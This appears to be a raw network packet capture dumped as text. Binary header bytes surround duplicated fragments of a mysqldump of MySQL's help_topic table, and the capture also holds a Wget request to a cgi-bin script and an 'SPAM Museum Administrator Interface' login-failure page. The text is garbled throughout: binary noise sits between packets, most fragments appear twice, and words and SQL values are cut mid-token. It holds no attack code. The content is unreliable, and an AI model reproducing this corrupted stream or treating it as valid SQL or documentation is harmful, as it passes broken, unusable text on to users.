mUc),(186,236),(281,236),(368,237),(281,238),(281,239),(352,240),(114,241),(148,242),(331,243),(37,244),(258,244),(91,245),(148,246),(20,247),(109,248),(351,248),(20,249),(107,250),(15,251),(368,252),(0,253),(43,254),(122,254),(368,254),(371,255),(0,256),(281,256),(0,257),(272,258),(331,259),(225,260),(371,261),(299,262),(369,262),(281,263),(78,264),(391,265),(272,266),(219,267),(281,268),(351,269),(371,270),(109,271),(24,272),(20,273),(20,274),(371,275),(375,275),(393,276),(351,277),(94,278),(19,279),(219,279),(375,279),(293,280),(351,281),(119,282),(245,282),(259,283),(371,284),(109,285),(258,285),(19,286),(119,286),(149,286),(219,286),(363,287),(368,288),(78,289),(371,290),(34,291),(60,291),(78,291),(186,291),(281,291),(272,292),(368,292),(43,293),(117,293),(368,293),(371,293),(375,293),(371,294),(281,295),(30,296),(117,296),(387,296),(368,297),(371,297),(190,298),(371,298),(371,299),(375,299),(23,300),(96,301),(351,301),(119,302),(149,302),(272,302),(293,303),(375,303),(265,304),(25,305),(37,305),(108,305),(176,305),(258,305),(331,306),(281,307),(287,307),(331,308),(368,309),(371,310),(23,311),(259,311),(265,311),(331,311),(374,311),(228,312),(281,312),(287,312),(306,312),(340,312),(379,312),(148,313),(23,314),(272,314),(392,315),(117,316),(281,316),(166,317),(78,318Cbb0`BiET@/o0AE<5@@!  P֞%g q mUc),(186,236),(281,236),(368,237),(281,238),(281,239),(352,240),(114,241),(148,242),(331,243),(37,244),(258,244),(91,245),(148,246),(20,247),(109,248),(351,248),(20,249),(107,250),(15,251),(368,252),(0,253),(43,254),(122,254),(368,254),(371,255),(0,256),(281,256),(0,257),(272,258),(331,259),(225,260),(371,261),(299,262),(369,262),(281,263),(78,264),(391,265),(272,266),(219,267),(281,268),(351,269),(371,270),(109,271),(24,272),(20,273),(20,274),(371,275),(375,275),(393,276),(351,277),(94,278),(19,279),(219,279),(375,279),(293,280),(351,281),(119,282),(245,282),(259,283),(371,284),(109,285),(258,285),(19,286),(119,286),(149,286),(219,286),(363,287),(368,288),(78,289),(371,290),(34,291),(60,291),(78,291),(186,291),(281,291),(272,292),(368,292),(43,293),(117,293),(368,293),(371,293),(375,293),(371,294),(281,295),(30,296),(117,296),(387,296),(368,297),(371,297),(190,298),(371,298),(371,299),(375,299),(23,300),(96,301),(351,301),(119,302),(149,302),(272,302),(293,303),(375,303),(265,304),(25,305),(37,305),(108,305),(176,305),(258,305),(331,306),(281,307),(287,307),(331,308),(368,309),(371,310),(23,311),(259,311),(265,311),(331,311),(374,311),(228,312),(281,312),(287,312),(306,312),(340,312),(379,312),(148,313),(23,314),(272,314),(392,315),(117,316),(281,316),(166,317),(78,318CbbBi0`ET@/p܂Ao0E<*@?  3Pʟb o )165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFACbb0`BiET@/Ԁo0SE<*@@  3Pʟb o )165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFACbbBi0`ET@/˃2o0E<6@?"  P֞%g [ mUc),(368,318),(371,318),(272,319),(41,320),(87,320),(148,320),(209,320),(236,320),(286,320),(164,321),(371,321),(371,322),(157,323),(371,324); 1000 UNLOCK TABLES; /*!40000 ALTER TABLE `help_relation` ENABLE KEYS */; -- -- Table structure for table `help_topic` -- DROP TABLE IF EXISTS `help_topic`; CREATE TABLE `help_topic` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `help_category_id` smallint(5) unsigned NOT NULL default '0', `description` text NOT NULL, `example` text NOT NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_topic_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help topics'; -- -- Dumping data for table `help_topic` -- /*!40000 ALTER TABLE `help_topic` DISABLE KEYS */; LOCK TABLES `help_topic` WRITE; INSERT INTO `help_topic` VALUES (0,'JOIN',6,'MySQL supports the following JOIN syntaxes for the\ntable_references part of SELECT statements and multiple-table\nDELETE and UPDATE statements:\n\ntable_reference, table_reference\ntable_reference [INNER | CROSS] JOIN table_reference [join_condition]\ntable_reference STRAIGHT_JOIN table_reference\ntable_reference LEFT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [LEFT C.bb0`BiET@/o0AE<6@@!  P֞%g [ mUc),(368,318),(371,318),(272,319),(41,320),(87,320),(148,320),(209,320),(236,320),(286,320),(164,321),(371,321),(371,322),(157,323),(371,324); 1000 UNLOCK TABLES; /*!40000 ALTER TABLE `help_relation` ENABLE KEYS */; -- -- Table structure for table `help_topic` -- DROP TABLE IF EXISTS `help_topic`; CREATE TABLE `help_topic` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `help_category_id` smallint(5) unsigned NOT NULL default '0', `description` text NOT NULL, `example` text NOT NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_topic_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help topics'; -- -- Dumping data for table `help_topic` -- /*!40000 ALTER TABLE `help_topic` DISABLE KEYS */; LOCK TABLES `help_topic` WRITE; INSERT INTO `help_topic` VALUES (0,'JOIN',6,'MySQL supports the following JOIN syntaxes for the\ntable_references part of SELECT statements and multiple-table\nDELETE and UPDATE statements:\n\ntable_reference, table_reference\ntable_reference [INNER | CROSS] JOIN table_reference [join_condition]\ntable_reference STRAIGHT_JOIN table_reference\ntable_reference LEFT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [LEFT CbbBi0`ET@/p܂Ao0E<*@?  3Pҟb  )ULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n',Cbb0`BiET@/Ԁo0SE<*@@  3Pҟb  )ULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n',CwbbBi0`ET@/˃2o0E<7@?"  P֞%g  mUc[OUTER]] JOIN table_reference\n{ OJ table_reference LEFT OUTER JOIN table_reference\n ON conditional_expr }\ntable_reference RIGHT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [RIGHT [OUTER]] JOIN table_reference\n\ntable_reference is defined as:\n\ntbl_name [[AS] alias]\n [[USE INDEX (key_list)]\n | [IGNORE INDEX (key_list)]\n | [FORCE INDEX (key_list)]]\n\njoin_condition is defined as:\n\nON conditional_expr | USING (column_list)\n','mysql> SELECT table1.* FROM table1\n -> LEFT JOIN table2 ON table1.id=table2.id\n -> WHERE table2.id IS NULL;',''),(1,'HEX',23,' HEX(N_or_S)\n\nIf N_OR_S is a number, returns a string representation of the hexadecimal\nvalue of N, where N is a longlong (BIGINT) number.\nThis is equivalent to CONV(N,10,16).\n\nFrom MySQL 4.0.1 and up,\nif N_OR_S is a string, returns a hexadecimal string of N_OR_S\nwhere each character in N_OR_S is converted to two hexadecimal digits.\n','mysql> SELECT HEX(255);\n -> \'FF\'\nmysql> SELECT 0x616263;\n -> \'abc\'\nmysql> SELECT HEX(\'abc\');\n -> 616263',''),(2,'REPLACE',23,' REPLACE(str,from_str,to_str)\nReturns the string str with all occurrences of the string\nfrom_str replaced by the string to_str.\n','mysql> SELECT REPCbb0`BiET@/o0AE<7@@!  P֞%g  mUc[OUTER]] JOIN table_reference\n{ OJ table_reference LEFT OUTER JOIN table_reference\n ON conditional_expr }\ntable_reference RIGHT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [RIGHT [OUTER]] JOIN table_reference\n\ntable_reference is defined as:\n\ntbl_name [[AS] alias]\n [[USE INDEX (key_list)]\n | [IGNORE INDEX (key_list)]\n | [FORCE INDEX (key_list)]]\n\njoin_condition is defined as:\n\nON conditional_expr | USING (column_list)\n','mysql> SELECT table1.* FROM table1\n -> LEFT JOIN table2 ON table1.id=table2.id\n -> WHERE table2.id IS NULL;',''),(1,'HEX',23,' HEX(N_or_S)\n\nIf N_OR_S is a number, returns a string representation of the hexadecimal\nvalue of N, where N is a longlong (BIGINT) number.\nThis is equivalent to CONV(N,10,16).\n\nFrom MySQL 4.0.1 and up,\nif N_OR_S is a string, returns a hexadecimal string of N_OR_S\nwhere each character in N_OR_S is converted to two hexadecimal digits.\n','mysql> SELECT HEX(255);\n -> \'FF\'\nmysql> SELECT 0x616263;\n -> \'abc\'\nmysql> SELECT HEX(\'abc\');\n -> 616263',''),(2,'REPLACE',23,' REPLACE(str,from_str,to_str)\nReturns the string str with all occurrences of the string\nfrom_str replaced by the string to_str.\n','mysql> SELECT REPCebbBi0`ET@/p܂Ao0E<*@?  3Pڟb P )'mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHCbb0`BiET@/Ԁo0SE<*@@  3Pڟb P )'mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHCbbBi0`ET@/˃2o0E<8@?"  P֞%g G mVcLACE(\'www.mysql.com\', \'w\', \'Ww\');\n -> \'WwWwWw.mysql.com\'',''),(3,'REPEAT',23,' REPEAT(str,count)\nReturns a string consisting of the string str repeated count\ntimes. If count <= 0, returns an empty string. Returns NULL if\nstr or count are NULL.\n','mysql> SELECT REPEAT(\'MySQL\', 3);\n -> \'MySQLMySQLMySQL\'',''),(4,'CONTAINS',11,' Contains(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 completely contains\ng2.\n','',''),(5,'SRID',19,' SRID(g)\nReturns an integer indicating the Spatial Reference System ID for the geometry\nvalue g.\n\nIn MySQL, the SRID value is just an integer associated with the geometry\nvalue. All calculations are done assuming Euclidean (planar) geometry.\n','mysql> SELECT SRID(GeomFromText(\'LineString(1 1,2 2)\',101));\n+-----------------------------------------------+\n| SRID(GeomFromText(\'LineString(1 1,2 2)\',101)) |\n+-----------------------------------------------+\n| 101 |\n+-----------------------------------------------+',''),(6,'CURRENT_TIMESTAMP',14,' CURRENT_TIMESTAMP\n CURRENT_TIMESTAMP()\n\nCURRENT_TIMESTAMP and CURRENT_TIMESTAMP() are synonyms for\nNOW().\n','',''),(7,'VARIANCE',12,' VARIANCE(expr)\nReturns the population standard variance of expCbb0`BiET@/o0AE<8@@!  P֞%g G mVcLACE(\'www.mysql.com\', \'w\', \'Ww\');\n -> \'WwWwWw.mysql.com\'',''),(3,'REPEAT',23,' REPEAT(str,count)\nReturns a string consisting of the string str repeated count\ntimes. If count <= 0, returns an empty string. Returns NULL if\nstr or count are NULL.\n','mysql> SELECT REPEAT(\'MySQL\', 3);\n -> \'MySQLMySQLMySQL\'',''),(4,'CONTAINS',11,' Contains(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 completely contains\ng2.\n','',''),(5,'SRID',19,' SRID(g)\nReturns an integer indicating the Spatial Reference System ID for the geometry\nvalue g.\n\nIn MySQL, the SRID value is just an integer associated with the geometry\nvalue. All calculations are done assuming Euclidean (planar) geometry.\n','mysql> SELECT SRID(GeomFromText(\'LineString(1 1,2 2)\',101));\n+-----------------------------------------------+\n| SRID(GeomFromText(\'LineString(1 1,2 2)\',101)) |\n+-----------------------------------------------+\n| 101 |\n+-----------------------------------------------+',''),(6,'CURRENT_TIMESTAMP',14,' CURRENT_TIMESTAMP\n CURRENT_TIMESTAMP()\n\nCURRENT_TIMESTAMP and CURRENT_TIMESTAMP() are synonyms for\nNOW().\n','',''),(7,'VARIANCE',12,' VARIANCE(expr)\nReturns the population standard variance of expCbbBi0`ET@/p܂Ao0E<*@?  3P⟪b U% )OW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the numCbb0`BiET@/Ԁo0SE<*@@  3P⟪b U% )OW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the numC@bbBi0`ET@/˃2o0E<9@?"  P֞%g 8 mVcr. This is an\nextension to standard SQL, available in MySQL 4.1 or later. As of MySQL\n5.0.3, the standard SQL function VAR_POP() can be used instead.\n','',''),(8,'VAR_SAMP',12,' VAR_SAMP(expr)\nReturns the sample variance of expr. That is, the denominator is the\nnumber of rows minus one. This function was added in MySQL 5.0.3.\n','',''),(9,'CONCAT',23,' CONCAT(str1,s 1000 tr2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are CIZZBi0`EL@/܂Sŀo0E4.@?I  PGOUݗ aG`s5CPBi0`E@/[Sŀo0E.@?  PGOU aG`s5GET /~acquire/cgi-bin/get.php?ip=2740 HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.20.1.3 Connection: Keep-Alive Cibb0`BiET@/o0AE<9@@!  P֞%g 8 mVcr. This is an\nextension to standard SQL, available in MySQL 4.1 or later. As of MySQL\n5.0.3, the standard SQL function VAR_POP() can be used instead.\n','',''),(8,'VAR_SAMP',12,' VAR_SAMP(expr)\nReturns the sample variance of expr. That is, the denominator is the\nnumber of rows minus one. This function was added in MySQL 5.0.3.\n','',''),(9,'CONCAT',23,' CONCAT(str1,s 1000 tr2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are C|ZZ0`BiEL@/6o0o+PE4.@@I  PGOUݗ aG`s5C0`BiE@/o0o+PE.@@  PGOU aG`s5GET /~acquire/cgi-bin/get.php?ip=2740 HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.20.1.3 Connection: Keep-Alive CZZBi0`EL@/ 6o+Po0E4&a@?k  PUGP6 `saGCZZ0`BiEL@/܀o0SE4&a@@k  PUGP6 `saGCbbBi0`ET@/p܂Ao0E<*@?  3P꟪b  )ber of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(Cbb0`BiET@/Ԁo0SE<*@@  3P꟪b  )ber of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(C bbBi0`ET@/p܂Ao0E<*@?  3P򟪮b L )M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FRC ZZBi0`EL@/Ao0E4@?H  PPZڿ"lg d%^C ZZBi0`EL@/܂Sŀo0E4\5@?J 3 Pu}U$ )*1C bb0`BiET@/Ԁo0SE<*@@  3P򟪮b L )M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FRC$ ZZ0`BiEL@/o0  E4@@G  PPZڿ"lg d%^C5 ZZ0`BiEL@/go0AE4\5@@J 3 Pu}U$ )*1C: Bi0`E@/Nlo0E^<@?Ĵ  3P: GM  y4'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

